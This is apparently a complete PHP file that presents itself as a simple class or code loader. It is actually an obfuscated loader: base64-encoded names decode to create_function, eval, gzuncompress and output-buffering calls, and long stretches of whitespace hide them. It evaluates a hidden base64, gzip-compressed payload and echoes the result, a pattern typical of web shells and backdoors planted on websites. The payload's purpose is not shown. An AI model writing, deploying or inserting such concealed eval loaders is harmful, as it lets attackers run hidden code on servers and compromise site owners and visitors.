<?php 
        $__='printf';$_='Loading the Class/Code NAME ...';
        































































































































































        $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='Q1JFQXRlX2Z1bkNUaU9u';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrt2s9rgzAUB/B7of9DDoVnYTjpxkYJOQzZRoV1sFWnvYg1KQzdLLVj7L/fjPaH7GJpO5h8PwHDUx6BPHkHDWOlXvhD0GL5+r6aE9dhRZCdRnl+bmdSsfHNwy3TsWmaxLudKp91OxinGEUl2BGJX3couHDSwH9KfWvqTZKx++wOH0k/2qlvI9VrIxgAQDtR/OZZ0nc+RvfeIHj5zJy74dz/Sq7Lrlm0zXXrDrFbAAAAAAD/Db5oAAC0F82iXF1dhlLFmVTEsSMAAAAHqR8nIP1/5O+XF3o2qqjP90nfyW2S2NsuaFBxpbPNsjgzcepRr4JRK3tZhD7/BiggVdE=';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






























































































































































                                                                                                                                                                                                                     $________;
